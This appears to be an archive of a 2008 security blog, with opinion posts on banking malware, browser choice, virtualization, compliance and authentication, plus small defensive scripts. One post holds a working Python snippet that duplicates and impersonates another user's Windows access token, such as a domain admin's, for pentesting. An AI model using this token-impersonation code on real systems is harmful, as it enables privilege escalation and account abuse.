Wednesday, December 31, 2008

Some good predictions for 2009

Sorry if you were expecting something big. Usually the best next year's predictions are the dullest ones. So far I've found these from Andreas Antonopoulos to be the best. But what do I mean by best? Best as in those with the biggest chances of being right.

According to the Black Swan theory (funny, I remember Antonopoulos and Dan Kaminsky discussing it during the bloggers meet-up back in April at RSA), I believe that we cannot predict huge things, as they are usually unexpected to the point of being unpredictable. Also, there are not many "big happenings" in security history, so there is no point in generating predictions full of big happenings. Can you remember a year full of huge information security stories?

Antonopoulos's predictions point to natural evolutions of current situations and threats. He may miss some big bang stuff that eventually happens, but I wonder how many will get that one right, if it really happens.

A very good 2009 to all of you. Thanks for reading all this crap during 2008. I hope to be a little more present and provide a little more content next year (new year resolution #n?). After all, life will probably be a little more stable. Or not. :-)

Friday, December 19, 2008

War and Information Security

Andrew Hay has posted a very nice piece on how war strategies evolved and how that compares to information security. He finishes it with this line: "I believe that all security professionals should be students of military history and tactics. Seeing what failed for great generals will show us how to adapt to, and defend against, network and system attack situations in the future." I definitely agree with him.

Phishing now installing malware...NEW?

I was LOL when reading about this "new stuff" from Network World today. They are saying that last August phishers started to change from trying to get information from victims to tricking them into installing malicious software? LAST AUGUST? Hey, that has been happening in Brazil for years now.

In Brazil the banks were already suffering from phishing back in 2002-2003. As the losses were huge, they started a big campaign to educate their customers about the threat. Soon people were avoiding any message that appeared to come from their banks. The criminals quickly changed their methods.

As people had been taught to avoid clicking on links in "messages coming from banks", Brazilian phishers quickly started to send messages that would use any possible pretext to trick people into clicking on their links. Those links redirected people to download executables, the famous "bank trojans" mentioned in the last Microsoft Intelligence Report. Messages could appear to be "virtual postcards", fake former university/college/high school colleagues sending their "see how I am now" pictures, photos from the latest plane crash, among others. Everything was an excuse for a new burst of fake messages tricking people into clicking links.

With that approach we could also see the trojan/backdoor evolution. They started as simple keyloggers sending passwords to an e-mail account through SMTP. When the banks started using on-screen keyboards, the malware also started to capture screenshots. When banks started using OTP cards, trojans started to open windows while the victim was visiting the bank's website requesting "card activation", obviously asking for all 40 numbers on that small card (!). Do I really need to say that people believed it and were doing that? :-)

Now several banks are using OTP tokens. The "bleeding edge" trojans are trying to change valid transactions from the user, by changing the bill that is being paid or even the destination account of a wire transfer. That only shows that whenever it is economically feasible, malware will always evolve to match security measures.

Why people stick to IE...or why should they change?

It's interesting to see some reactions after the IE 0-day thing that happened last week. There is one that always appears in these situations, the old question: "why don't people change from IE?"

First, I believe this question should be answered in two parts, home users and corporate, with the final answer being the result of both together. Andrew Hay answered it properly for the corporate side. For the home user, I believe the biggest challenge is making people aware that other browsers exist and that changing from IE to another won't be that hard. It's mostly an awareness problem. However, if the recently Firefox-converted user tries to access a website and it doesn't work well, he will switch back to IE and assume that "switching browsers is no good because the other browsers don't work".

OK, the problem of "why people don't change" is not that hard to understand. However, my question is a little different: why should we change? Or, should we really change?

Security issues are the result of threat presence and vulnerabilities. Internet Explorer is a huge target today, making the "threat presence" quite big. But that happens mostly because of IE's market share. If you are trying to exploit browser vulnerabilities you will probably aim at the browser with the most users, making it easier to find a vulnerable target. Will that still be true for IE if other browsers are able to catch up on market share? I'm certain that exploits, malware and drive-by attacks will become very common for other browsers if they achieve a higher market share.

Finally, on the vulnerability side, there are some indications that IE is not that bad, or that it is at least only as bad as the others. It's not fair to judge the security of a piece of software by looking at a single vulnerability, as seems to be the case for IE now.

Having said that, I must say that I use Firefox for security reasons. I do that mostly because most of the THREATS are IE related, not necessarily because I think IE is more vulnerable. If Firefox market share grows to a point where malware production targeting it becomes higher than for IE, I'll certainly switch browsers again (Chrome?).

OK, some might say that I just presented a different reason why people should move from IE to Firefox, and that the move still needs to happen. Yes, I would suggest it for home users, but if the move starts to happen in a massive way, also including corporate users, its results will probably be innocuous. Funny, isn't it? To keep Firefox more secure, it's better that people don't change.

That's the perfect example where a Nash equilibrium solution would fit. It's also aligned with Dan Geer's ideas about software monocultures. How to achieve that perfect solution? If I knew it I would be a millionaire by now :-)

Tuesday, December 16, 2008

2009 predictions

Everybody is doing that, so I'll try some too. But I won't try any bold move here, like Paul Asadoorian did :-) I'll mention four main things:

  1. Apple threats: the number of people using Macs is growing very fast. It is starting to become attractive for botnet herders, especially because almost all Mac users don't have anti-malware software installed nor the habit of worrying about it, so it's easy to keep the bots installed. A few years ago I would expect a big worm coming, but cybercrime is a reality now and those guys know when an opportunity like this arises.

  2. Blended/Hybrid Threats: We are seeing this already, like this malware that exploits SQL Injection and an IE vulnerability. I believe we will see a lot of threats using multiple attack vectors, maybe even across different platforms and technologies. Vulnerabilities that can be used to redirect traffic from multiple users (like Dan Kaminsky's DNS bug) will be used to force people to access infected content, which will trigger other infection mechanisms. Worms will be able to spread to a higher number of hosts without generating suspicious spikes on charts, as the malware code will randomly choose between several infection methods. Expect some huge botnets being found as a result.

  3. At least one "cloud computing" security incident: OK, not that hard to predict, but I'll try to be a little more specific in the details :-). There will be a discussion about what was compromised (infrastructure? application? vendor? client?) and people will start discussing how to conduct forensics under those new conditions.

  4. Virtualization nightmare: A vulnerability will be found in a virtualization platform or in a virtualization-aware product, enabling attacks from one guest OS to another (or even reaching a guest OS and triggering the exploit on another). It will be extremely fun to watch those "the cat is on the roof" discussions. A new wave of miraculous products will be released to address that specific kind of attack. Your VM infrastructure will look like a Christmas tree and the operational cost of a virtualized environment will no longer be what was expected.
Let the game begin! Let's see how I'll do in 12 months :-)

Thursday, December 11, 2008

Keep alive

As all bloggers sometimes do, I'll also post a simple "keep alive" here just to show that this is not an abandoned blog :-) It is holiday season, with guests at home, more things to do at work and too few interesting things out there to comment on. So, please don't unsubscribe; I'm keeping some notes about what to post and I hope to start 2009 with some good content here. Thanks for your patience :-)

Tuesday, December 2, 2008

Can good programmers be part of a SDLC?

I've just read this small article from Paul Graham, called "The other half of 'Artists Ship'". The key point of the text is this:

"For good programmers, one of the best things about working for a startup is that there are few checks on releases. In true startups, there are no external checks at all. If you have an idea for a new feature in the morning, you can write it and push it to the production servers before lunch. And when you can do that, you have more ideas.

At big companies, software has to go through various approvals before it can be launched. And the cost of doing this can be enormous—in fact, discontinuous. I was talking recently to a group of three programmers whose startup had been acquired a few years before by a big company. When they'd been independent, they could release changes instantly. Now, they said, the absolute fastest they could get code released on the production servers was two weeks.

This didn't merely make them less productive. It made them hate working for the acquirer."

Assuming that writing secure code and a complete Secure Development Life Cycle can be described as "checks" and "controls", it would be natural to assume that good programmers don't want to work for companies with a SDLC in place. That is certainly an important thing to consider when adopting a more secure approach to software development. We know that a SDLC works for generating more secure code. But can we keep the good programmers while doing that? Can this issue be a big enough problem to make a company choose not to implement a SDLC?

AV on Mac

Of course you will need that, as even Apple is saying now. I can say that the need for anti-malware is one of the "growing pains" of end user Operating Systems. Soon they will start to suffer from backward compatibility issues, "too dumb" users, badly written applications and the other problems that Windows has had to deal with over the last years. At least there is still the hardware vendor "monopoly" for Mac OS, which makes things a little easier for the OS. The other things will likely be exactly the same.

Monday, December 1, 2008

VP has taken the red pill

My friend VP has just discovered that everything is broken. He is talking about his latest work pentesting web applications. I had the same feelings about basic network infrastructure: privileged credentials, file shares, the xyz-illion unidentified devices plugged into the network.

The interesting part of this job is not realizing that everything is broken. He probably went through an amnesia crisis or something like that, because we noticed that ages ago. The real issue is not that, nor trying to fix everything, but how to achieve business survivability/assurance without having to fix everything. That's the kind of challenge that is really interesting!

Wednesday, November 26, 2008

Windows pen testing - access tokens

I'm a bit late on this subject, but I think it's worth a post. For those who do pentesting and usually get some access to Windows boxes, but are looking for a specific credential (like a domain admin), impersonating the access tokens available on those boxes can be a very useful approach. The details about how to do it and the tools available can be found in this paper from Luke Jennings.

By the way, Jennings also published some good stuff about MQ Series and general mainframe security. You can find it (and more) at MWR Labs.
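For the curious, the core of the technique is just a handful of Win32 calls: open a process running under the credential you want (say, a domain admin's session), duplicate its token and impersonate it. Below is a minimal Python/ctypes sketch of that sequence; it assumes you already have admin rights/SeDebugPrivilege on the box and know the PID of a target process, and it leaves out all error handling.

```python
import ctypes
from ctypes import wintypes

kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
advapi32 = ctypes.WinDLL("advapi32", use_last_error=True)
kernel32.OpenProcess.restype = wintypes.HANDLE

PROCESS_QUERY_INFORMATION = 0x0400
TOKEN_DUPLICATE = 0x0002
TOKEN_QUERY = 0x0008
MAXIMUM_ALLOWED = 0x02000000
SecurityImpersonation = 2   # SECURITY_IMPERSONATION_LEVEL
TokenImpersonation = 2      # TOKEN_TYPE

def impersonate_process_owner(pid):
    """Impersonate whatever account the process 'pid' is running as."""
    h_proc = kernel32.OpenProcess(PROCESS_QUERY_INFORMATION, False, pid)
    h_token = wintypes.HANDLE()
    advapi32.OpenProcessToken(h_proc, TOKEN_DUPLICATE | TOKEN_QUERY,
                              ctypes.byref(h_token))
    h_dup = wintypes.HANDLE()
    advapi32.DuplicateTokenEx(h_token, MAXIMUM_ALLOWED, None,
                              SecurityImpersonation, TokenImpersonation,
                              ctypes.byref(h_dup))
    # From here on, this thread acts with the duplicated token's identity.
    advapi32.ImpersonateLoggedOnUser(h_dup)

# impersonate_process_owner(1234)  # PID of a process owned by a domain admin
```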

Tuesday, November 25, 2008

Simple but dreadful, part 3 - Workstation local administrator

The logic behind risk management makes almost all companies focus on protecting their servers instead of spending time on the workstations. Although it seems to make sense, it is important to note that people access, generate and input information on sensitive applications and servers mostly through their workstations. Owning the workstations of an organization can be as bad as owning its servers.

One of the easiest ways to do that is to identify how the organization deals with the local administrator account of its workstations. Setting a password for the local admin account seems to be an easy thing to do, but when you have thousands of workstations it can really become a nightmare. Some companies try to set a single strong password for all workstations, but that means that if this password is compromised the keys to the whole kingdom are lost. You may think that using a very strong password can avoid problems from offline cracking (together with disabling LanMan hashes, etc. - I assume you know the basics about Windows passwords), but remember that if a single guy from IT support (the guys who know that password) is fired or discloses the password to someone outside the entitled circle, you will have to change it on ALL workstations.

Now, if you can do that (yes, there are lots of companies that are not even prepared to do that), it would be a good idea to start thinking about using a different password for each workstation. You may think I'm crazy, but there are tools that allow you to do that in a pretty decent (and secure) way, from a central location and with a lot of controls over who accesses those passwords.

Also remember that if you properly manage permissions on those workstations you will most likely never use that password. You will have a group of administrators as part of the "local admin" group on each box, meaning that they won't need the admin account to do anything there, giving you the bonus of better accountability.

Some things to avoid when defining your strategy to manage workstation local admin passwords:

  • Logon scripts with clear text passwords (noooo!!!!!!!!!!)

  • Scripts from SMS or other central management tools with clear text passwords (believe me, the users will find them!)

  • That-same-very-secret-password-that-only-those-ten-guys-know-about-for-all-boxes mistake (yes, I mentioned that before. Just in case)

  • Different passwords generated by a "security by obscurity" algorithm that uses the name of the workstation as input. Hey, if it's a bad idea in encryption, why would it be a good idea for passwords? (See the sketch below for the safer alternative.)
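To make that last point concrete, here is a minimal sketch of the safer approach: generate a cryptographically random password per workstation and keep the mapping in a central, access-controlled store. The workstation list, password length and "vault" are placeholders; the point is only that the passwords share nothing with the machine names.

```python
import secrets
import string

ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*"
workstations = ["WS-FIN-001", "WS-FIN-002", "WS-HR-014"]  # placeholder inventory

def random_password(length=20):
    """Independent, random password; nothing derivable from the hostname."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

vault = {ws: random_password() for ws in workstations}

# 'vault' would go into a central, audited password store, never a script or a
# share; compromising one workstation's password reveals nothing about the rest.
for ws, pwd in vault.items():
    print(ws, pwd)
```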

Friday, November 21, 2008

After all, how infosec is related to SOX??

Yes, a lot of security professionals went to the bill's text and were not able to find anything related to information security, even when directed to sections 302 and 404. I was very happy to find this post from the eIQnetworks blog today, as it is written in the exact same way that I explain this issue to those who ask me. So, to save some words, you can go directly to their post.

Friday, November 14, 2008

I've never seen my previous CSO role so well explained

I stumbled upon this blog from Shrdlu (which just entered my blogroll) and found a very good piece on why a CSO ends up working more than (OK, as much as) his/her employees. Also a very good post from him on incident response.

Mogull on adaptive Auth and AuthZ

Richard Mogull mentions on his blog today the concepts of adaptive Authentication and Authorization. In short, from his post:

  • "User: This is an area I intend to talk about in much greater depth later on. Basically, right now we rely on static authentication (a single set of credentials to provide access) and I think we need to move more towards adaptive authentication (where we provide an authentication rating based on how strongly we trust that user at that time in that situation, and can thus then adjust the kinds of allowed transactions). This actually exists today- for example, my bank uses a username/password to let me in, but then requires an additional credential for transactions vs. basic access.

  • Transaction: As with user, this is an area we’ve underexplored in traditional applications, but I think will be incredibly valuable in cloud services. We build something called adaptive authorization into our applications and enforce more controls around approving transactions. For example, if a user with a low authentication rating tries to transfer a large sum out of their bank account, a text message with a code will be send to their cell phone with a code. If they have a higher authentication rating, the value amount before that back channel is required goes up. We build policies on a transaction basis, linking in environmental, user, and situational measurements to approve or deny transactions. This is program logic, not something you can add on."
I'll leave out of this post the ideas about cloud computing, layers and the real meat of his post, but I want to stress how nice the adaptive authentication and authorization concepts are. Richard is right when he says that banks are already doing that; I remember including the concept in the online banking of a bank I worked for almost 4 years ago. The interesting thing, however, would be bringing that to the other authentication and authorization actions that exist inside (and outside, in the cloud, whatever) the organization. It could be used to further protect privileged IDs, to enforce stronger controls over remote access from potentially malicious networks or during specific time ranges, and over a lot of other conditions that could indicate a higher threat level. In fact, it could even be deployed through transparent proxies in front of the applications, without needing code changes or hard-to-deploy integrations.

Definitely something that should be better explored by security vendors.
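Just to make the concept a bit more tangible, here is a toy sketch of adaptive authentication/authorization: a trust rating is computed from contextual signals and compared against what the requested transaction demands. All the signal names, weights and thresholds below are invented for illustration.

```python
def auth_rating(context):
    """Score how much we trust this session right now (0.0 - 1.0)."""
    score = 0.3  # base: a valid username/password was presented
    if context.get("otp_token_used"):
        score += 0.4
    if context.get("known_device"):
        score += 0.2
    if context.get("source_network") == "internal":
        score += 0.1
    return min(score, 1.0)

def authorize(transaction, context):
    rating = auth_rating(context)
    # Higher-value transactions require a higher rating; otherwise demand a
    # back-channel confirmation (SMS code, callback, etc.) before approving.
    required = 0.4 if transaction["amount"] < 1000 else 0.8
    return "approve" if rating >= required else "request_step_up"

print(authorize({"amount": 5000}, {"otp_token_used": False, "known_device": True}))
```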

TCG IF-MAP

I was very excited to read about TCG IF-MAP on Chris Hoff's blog last week. Chris found it interesting as something that could bring some light to the "cloud nightmare" and to virtualization issues. I like IF-MAP, however, because it raises the security intelligence level of the network.

Today most SIEM installations are working mostly with information from network devices and concentration points, like firewalls and IPSes. There are a lot of things happening in the endpoint world, behind those enforcement points, that are not usually detected and fed into correlation systems. IF-MAP seems to be a nice way to share security information across security tools, including SIEMs, to allow better correlation. Look at this example from the IF-MAP FAQ:

"Q. What can people do with IF-MAP?
A. The IF-MAP 1.0 specification supports many use cases. The following are two examples:
• An intrusion detection system with an IF-MAP client publishes an alert to an IF-MAP server ("IP address 10.10.100.24 is sending anomalous traffic"); a firewall that subscribes to information involving 10.10.100.24 receives a notification from the IF-MAP server, triggering an automatic response
• A Security Event Manager (SEM) system queries an IF-MAP server to find the aggregate associations between the IP address and MAC published by the DHCP server, the user name published by the RADIUS server, and the hostname published by the DNS server.
Since IF-MAP is extensible, more use cases may be supported in the future."

I have always believed that effective correlation in security should be able to deal with information from different layers, like MAC, IP, port, user name, information context, physical location, among others. Sometimes two events don't show any correlation when you look at the network level, but when you look at them at higher layers you can see they are referring to similar things. With this perspective you can not only figure out that the exploit from IP X being detected by the IDS and blocked at the firewall is the same event (OK, that has its value, but not that much), but you can also start to identify collusion between different internal users to bypass segregation of duties controls, privilege abuse and stolen credentials in use. That should be the playing field for security intelligence, and IF-MAP can help vendors produce tools that can do that.
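A tiny sketch of the kind of cross-layer join I'm talking about: bindings published by different sources (DHCP for IP/MAC, RADIUS for MAC/user, DNS for IP/hostname) let two events that look unrelated at the network layer resolve to the same user. All the data below is made up, and the plain dictionaries stand in for what an IF-MAP server would hold.

```python
dhcp = {"10.10.100.24": "00:1a:2b:3c:4d:5e"}          # IP -> MAC
radius = {"00:1a:2b:3c:4d:5e": "jdoe"}                 # MAC -> user
dns = {"10.10.100.24": "ws-fin-042.corp.example"}      # IP -> hostname

def enrich(event):
    """Attach identity context from other layers to a network-level event."""
    ip = event["src_ip"]
    mac = dhcp.get(ip)
    return {**event, "mac": mac, "user": radius.get(mac), "hostname": dns.get(ip)}

ids_alert = {"src_ip": "10.10.100.24", "signature": "anomalous traffic"}
fw_block = {"src_ip": "10.10.100.24", "action": "deny"}

# Both events now resolve to the same user and host, which is what makes
# higher-layer correlation (privilege abuse, stolen credentials) possible.
print(enrich(ids_alert)["user"], enrich(fw_block)["user"])
```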

Friday, November 7, 2008

Sarbanes Oxley, good to hear people questioning

John Pescatore is right when he says that talking about less regulation at this time seems out of step with the current crisis, but the article he points to is very precise in saying that the costs of SOX are pretty high and, as we could see, it wasn't able to prevent cases like Bear Stearns, Lehman Bros., AIG and Merrill Lynch. Accountants are as creative as lawyers; they will always look for loopholes in the controls (laws) to do their magic.

SOX brought a lot of money to information security, but it also brought a directed focus on some controls that are not always the ones most needed by every organization. It would be nice to see a review of the law, verifying its results and actual costs.

The WPA sky is not falling

A lot of noise was made this week about new research that "cracked" WPA. Well, there are more details about it today, and they clearly show that the WPA sky is not falling.

There is a very good summary of what is happening in the article above:

"To describe the attack succinctly, it's a method of decrypting and arbitrarily and successfully re-encrypting and re-injecting short packets on networks that have devices using TKIP. That's a very critical distinction; this is a serious attack, and the first real flaw in TKIP that's been found and exploited. But it's still a subset of a true key crack."

So, it's not the final attack against WPA-protected networks, but it is a very important building block for more elaborate attacks. I can see that in the near future we will see more serious stuff being done using this as a starting point. Keep your ears open.

Friday, October 31, 2008

Virtualization? Give me a better OS instead!

Do we really need to go that deep into virtualization? I may sound dumb trying to reason against something that everybody is embracing, but that's usually what I like to do about hypes :-)
OK, you'll probably throw a lot of virtualization advantages at me. And I agree that most of them are true. I was reading that some companies have been able to increase their hardware processor utilization from 10% to 60% through virtualization. There is also all that high availability stuff from VMotion and the other new products being released every day. OK, but...
Let's go back some years and see how we ended up where we are. Imagine that you had to put two new applications into production, A and B. To ensure proper segregation you decide to put each application on its own server, X and Y.
Of course, as they are both critical apps, you also build servers Z and V for high availability purposes.
In a few months, people start to complain that the servers' utilization is too low. They are consuming too much power, rack space, blah blah blah. OK, then someone pulls a nice rabbit from a hat called virtualization. Wow! Now you transform the hardware X and Y into VM servers (or whatever you want to call them), build separate VMs for A and B and, as your VM product has a nice feature for dynamically moving images from one box to another, you don't need Z and V anymore. Wow! You've just saved 50% of server-related costs!
OK, you could probably be worried about putting those applications on the same "real" box. After all, you decided before that they should be running on different servers, and here they are on the same box! But you look into the problem and notice:
- One virtual server cannot interact with the other
- Problems caused by application A still can't cause problems on application B's server
- A security breach on virtual server A will not affect virtual server B
Ok, everything is still good and you go to bed happy with the new solution.
But no, people are greedy!
Seriously, now that we have all those servers on the same box, why can't we have a little more control over their access to the available resources? Like, if one server is not using all the memory allocated to it, why can't the other one use it when needed? The same for processing power and storage. But in order to do that the hypervisor would need a better view into what is happening inside those black boxes... why not make them aware of the VM environment? Build APIs that allow communication between the guest OSes and the hypervisor? Nice! Now things are starting to get really advanced!
But where is that segregation that was mentioned before? Won't all this interaction between the HV and the guest OSes reduce the isolation? Of course it will! Some attacks from guest OSes against the HV or other guest OSes are now possible. Anyway, it's the price of better management and better resource utilization. Isn't it?
Yes, it is. We already knew it! Isn't it the same price we pay to put two applications on the same REAL box? Let's see. We want hardware resources to be shared by the applications and something controlling that sharing. One application shouldn't be affected by the other or access non-authorized resources. And we want high availability too.
Well, please tell me if I'm wrong, but for me these things are just the requirements of a good Operating System with cluster capabilities!
Virtualization guys usually refer to mainframes as a virtualization success case. They are right about it. But on mainframes LPARs (their name for VMs) are usually used to isolate completely different environments, like development and production. It is very common to find several applications running on the same LPAR, segregated only by the OS and the Security Manager (which can be seen as part of the OS). Usually, LPARs are used because organizations can't afford different hardware for things like testing, certification and development, while in the "new virtualization" world VMs are used to optimize resource utilization. As far as I remember from my Operating Systems classes at university, that was the Operating System's role.
Are we creating this beast because we couldn't produce an Operating System that does its job?

Tuesday, October 28, 2008

I let this one pass

I was visiting Dan Kaminsky's blog today and noticed that he is creating a community council to help with the disclosure of big vulnerabilities like the one he found in DNS, and others that followed, including that famous one in TCP that Robert E. Lee and Jack Louis are planning to disclose after vendors have issued their patches. This is a very good outcome of all the happenings of the last months.

With a council like that, everybody who finds a vulnerability and thinks it is critical enough to start a coordinated effort to fix it and disclose the details will have a safe place to go. Not only will it be full of people with enough knowledge to verify their claims and make sure it is not something old or not-that-big, but it will also be a trusted party that won't "steal" the credit for the discovery. If they manage to make its existence and purpose known to the security research community, the only reason left for someone to go into a "partial disclosure" alone will be "flash fame".

Another step towards a more mature security research community. Nice!

Financial malware gets smarter? But we've said that many times!

This is yet another case of predictions coming true; now it's Kaspersky's turn to say that malware is changing the way it attacks online banking users to defeat two-factor authentication. They even try to create a new security buzzword for it:

"For example, two-factor authentication for online banking, which uses a hardware token in addition to a secret password, is increasingly ineffective. This is because malware writers have perfected the tools to get around it by redirecting the user to a separate server to harvest the necessary access information in real time – the so called 'man in the middle' attack.

This defeats the two-factor process, but malware writers have taken the process a step further with a new 'man in the endpoint' attack. This eliminates the need for a separate server by conducting the entire attack on the user's machine."

Nice catch, but we have been saying that this would be the next logical step for financial malware evolution since 2005. Now that it's here, the important question is: how are we going to deal with it? If 2FA doesn't work, what does?

There is some interesting stuff being developed to provide a "secure tunnel" inside the user's computer, avoiding keyloggers and other nasty stuff. But again, we end up in that malware x protection_software_whatever arms race on the user's computer. Every time a security company develops something to protect resources from being tampered with by malware, malware evolves to get the information from a lower-level layer or by disabling the security software. This problem won't go away until we can assure that security software will always run at a higher privilege level than the malware.

I like Windows Vista because of the effort to make the user run as a non-privileged user. Unfortunately, this hasn't been the Microsoft OS user culture for years, and it won't appear from nothing. UAC tried to make it less painful, but the huge amount of badly designed 3rd party software turned that feature into a nightmare. Even with all the SDLC efforts there is still a lot to be done outside of Redmond. Unix and Linux have technology- and security-conscious users. Apple has complete control over hardware and software. Microsoft, on the other hand, lives in hell (no control over hardware AND software, plus the dumbest users).

An intermediate option to secure online banking transactions is to explore the different devices that bank customers have. There are some products that implement 2FA on mobile phones, but most of them suffer from the same vulnerabilities as regular 2FA tokens. Challenge-response and transaction signing could leverage mobile phones as an OoB (out of band) factor. An over-simplified example would be:

- The user initiates the transaction on the computer
- The bank encrypts the received transaction data with the user's public key and sends it by SMS to his mobile, together with a confirmation code
- The bank's app on the phone receives the message and decrypts it with the user's private key
- The user verifies the details of the transaction on the mobile and, if everything matches what was sent from the computer, sends the confirmation code back to the bank (this can be done outside of the original session, to minimize the asynchronous nature of the conversation), which then finishes the transaction

You may ask why the user answers the challenge from the computer instead of doing that from the phone too. This is because end users' SMS messages can have a different priority level on the mobile networks than the messages sent by the bank, which can buy differentiated SLAs from the carriers.

I know that there are lots of challenges in this single example (public key encryption on devices with limited resources, protecting the user's private key, mobile network dependency, among others), but it can be seen as a way to allow users to do banking over untrusted channels. The catch here is that only half of the transaction passes through an untrusted channel. One can argue that the mobile network is also untrusted, but in order to commit fraud both channels would have to be compromised by the same attacker. Very unlikely (not impossible!).
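To make the flow above a bit more concrete, here is a toy sketch of the message exchange only. It does not implement real crypto or a real SMS gateway; every function and field name is invented for illustration.

```python
import secrets

def bank_start_transaction(txn, user_phone, send_sms):
    """Bank side: a transaction arrived from the (untrusted) web channel."""
    confirmation_code = secrets.token_hex(4)
    # In the example above this payload would be encrypted with the user's
    # public key before being pushed to the phone app.
    send_sms(user_phone, {"txn": txn, "code": confirmation_code})
    return confirmation_code

def user_confirm_on_phone(sms_payload, txn_as_typed):
    """Phone side: show the details, release the code only if they match."""
    if sms_payload["txn"] == txn_as_typed:
        return sms_payload["code"]
    return None  # details were tampered with on the computer; abort

# The bank then compares the code the user types back (over any channel) with
# the one it generated; fraud requires compromising both channels at once.
```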

Thursday, October 23, 2008

Microsoft MS08-067

I have been away from the blog for a while for a series of reasons, but I couldn't avoid commenting on this recently published advisory from Microsoft, MS08-067. Just like some worms we witnessed in the past, this one is related to a core Windows service, meaning that almost all boxes are vulnerable. It's also interesting to see that the security efforts around Vista and Server 2008 have brought results, as those versions are not as vulnerable to this issue as previous ones. Thanks to DEP and ASLR for that!

Now it's just a matter of time until the first worms and bots. I'm already seeing some emergency patch management processes being fired up to deal with it, but it's important to ensure that detection and reaction capabilities are also up to date. Keep an eye on the sources for IDS signatures and be sure to check if your SIEM/log analysis systems are able to identify abnormal traffic related to the Server service (139/445 TCP). Do a quick review of your incident management procedures to ensure that people will know what to do if the bell rings. For instance, if you catch signs of infection in your internal network, how will you act to identify and clean the infected computers?

May the Force be with you!
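If your SIEM can't do that yet, even a crude script over exported firewall logs gives you a starting point: flag internal hosts that suddenly talk to many distinct peers on 445/139. The sketch below assumes a simple CSV export (timestamp,src,dst,dport); adjust the threshold and the format to your environment.

```python
import csv

THRESHOLD = 50  # distinct destinations per source; tune for your network

def noisy_smb_talkers(logfile):
    """Return sources that contacted more than THRESHOLD hosts on 445/139."""
    targets = {}  # src_ip -> set of dst_ips contacted on the Server service ports
    with open(logfile) as f:
        for row in csv.DictReader(f, fieldnames=["ts", "src", "dst", "dport"]):
            if row["dport"] in ("445", "139"):
                targets.setdefault(row["src"], set()).add(row["dst"])
    return {src: len(dsts) for src, dsts in targets.items() if len(dsts) > THRESHOLD}

# for host, count in noisy_smb_talkers("fw_export.csv").items():
#     print(f"possible infection: {host} touched {count} hosts on 445/139")
```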

Saturday, October 18, 2008

Victor is back

My friend Victor is back to the blogosphere. He built a blog platform just for his new blog, Visigodos.org. He blogs about a number of things, but mostly software development and security. His latest post (VP, you need to develop something to link directly to a specific post!) about vulnerabilities related to debugging code is pretty interesting.

Welcome back, VP!

Wednesday, September 24, 2008

Which compliance pill to take?

Anton Chuvakin wrote a very good piece about PCI and how regulations like that are usually written and interpreted. He is completely right in defining the problem as:

  1. Mandate the tools (e.g. "must use a firewall") - and risk "checklist mentality", resulting in BOTH insecurity and "false sense" of security.
  2. Mandate the results (e.g. "must be secure") -  and risk people saying "eh, but I dunno how" - and then not acting at all, again leading to insecurity.
About those options, he says:

"Take your poison now?! Isn't compliance fun? What is the practical
solution to this? I personally would take the pill #1 over pill #2 (and
that is why I like PCI that much), but with some pause to think, for sure."

Actually, I believe it may be possible to reach an intermediate alternative. By defining the rules and standards for risk assessment and management, we could set standards for acceptable risk levels instead of saying "must be secure", without needing to go as deep as "must use a firewall". Of course this approach would raise several questions about how to achieve compliance, but it would give organizations more freedom in how to approach the risks and avoid the "checklist mentality".

The problem with risk management based compliance is that the organization can manipulate its risk assessments and downplay things that should be identified as "high risks". If the risk equation and the impact and probability levels are standardized, however, it would be easy to compare apples to apples and say things like "risks above level X must be mitigated to level Y".
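A toy illustration of what that standardization buys you: if the impact and probability scales are fixed by the standard, assessments from different organizations become comparable, and a rule like "anything above level X must be brought down to level Y" can actually be enforced. The scales, thresholds and findings below are all invented.

```python
IMPACT = {"low": 1, "medium": 2, "high": 3}
PROBABILITY = {"rare": 1, "possible": 2, "likely": 3}

MUST_MITIGATE_ABOVE = 4   # "level X" fixed by the standard
ACCEPTABLE_TARGET = 4     # "level Y" fixed by the standard

def risk_level(impact, probability):
    return IMPACT[impact] * PROBABILITY[probability]

findings = [
    ("unencrypted cardholder data on file share", "high", "likely"),
    ("weak password policy on isolated test lab", "low", "possible"),
]

for name, imp, prob in findings:
    level = risk_level(imp, prob)
    if level > MUST_MITIGATE_ABOVE:
        print(f"{name}: level {level}, must be mitigated to <= {ACCEPTABLE_TARGET}")
    else:
        print(f"{name}: level {level}, acceptable")
```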

Even taking that approach, we would still have to deal with the control efficiency problem. Like the firewall that Anton mentioned, for several controls (probably most of them) the way they are implemented and managed is even more important than the control itself. Maybe the best way to solve that is defining appropriate ways to deploy and maintain each proposed control. OK, we could go into a very deep (and inefficient) level of detail by doing that. It seems to be a catch-22 situation. Personally, I don't know who is worse at deciding where the bar should be placed: auditors or standard writers. I don't trust either :-)

Thursday, September 18, 2008

It is so obvious that it hurts

Just found it:

People a big security threat to virtualization, Interop speaker says - Network World

People a big threat to virtualization?? Woo!!!

If you replace "virtualization" by any other hot technology you will see it will also be true.

Security is always designed and deployed in a way that relies on people's decisions. Security is often a minor priority for people, so they'll make decisions based on other aspects, like time and budget constraints.

That is, you can expect people to make bad security decisions. If security controls are based on people's decisions...there's your "big security threat".

Tuesday, September 16, 2008

Wordpress security

I wrote in a rush about testing blog "desktop clients" last week and I don't think I made it clear why I was doing all that testing or what the results were. OK, I'll try to summarize.

My blogs run on Wordpress on a regular hosting service. I have my own domain names, but I don't have, and don't want to spend money on, digital certificates for them. So, if I want to access my websites over SSL I need to use a "generic" domain name from the service provider, like mydomain.sslpowered.com or something like that. The problem is the way Wordpress handles the URLs you are using: my website is configured as www.securitybalance.com, and the wp-admin interface won't work properly if I try to reach it through another URL, like securitybalance.sslpowered.com, because Wordpress insists on the URL configured for the site. So, how can I post to my blog over a protected connection?

I was reading a lot about some plugins for Wordpress, some mod_rewrite tricks and other magic. I wasn't feeling very confident about any of those. Then I learned about the XML-RPC interface for Wordpress. It is a webservice used by several platforms as a standard API for blogging. I noticed that the "desktop blogging clients", applications for those who want to write their posts offline and upload them later, usually access the blog through that API. What if I called that webservice (wordpress_blog/xmlrpc.php) using my SSL URL? Well, it turns out that it works! I just had to find a good desktop blogging client that could satisfy some personal requirements (running from my portableapps thumb drive), and I ended up with ScribeFire. It runs inside Firefox as an add-on, which makes it even easier to use. I tried Zoundry first, but it is vulnerable to a man-in-the-middle attack, as it can't recognize a bogus certificate.

So, the tip for Wordpress bloggers is: use ScribeFire with an SSL-protected URL for your XML-RPC API instead of posting through the regular wp-admin interface.
